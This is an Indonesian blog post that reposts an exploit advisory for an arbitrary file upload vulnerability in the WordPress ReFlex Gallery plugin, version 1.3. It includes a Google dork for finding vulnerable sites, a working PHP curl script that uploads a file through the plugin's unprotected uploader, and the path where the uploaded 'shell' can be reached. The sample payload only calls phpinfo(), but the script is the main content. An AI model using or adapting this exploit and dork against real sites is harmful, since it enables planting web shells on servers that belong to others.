Jumat, 19 April 2013

Wordpress Plugins ReFlex Gallery Arbitrary File Upload Vulnerability

##################################################
# Description : Wordpress Plugins - ReFlex Gallery Arbitrary File Upload Vulnerability
# Version : 1.3
# Link : http://wordpress.org/extend/plugins/reflex-gallery/
# Plugins : http://downloads.wordpress.org/plugin/reflex-gallery.zip
# Date : 30-12-2012
# Google Dork : inurl:/wp-content/plugins/reflex-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

PostShell.php

<?php

$uploadfile="lo.php";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://localhost/wordpress/wp-content/uploads/
Filename PostShell.php output

lo.php
<?php
phpinfo();
?>

Artikel Terkait

0   Comment

Posting Komentar

Hanya Untuk BlogWalking !

No Spam !

Cancel Reply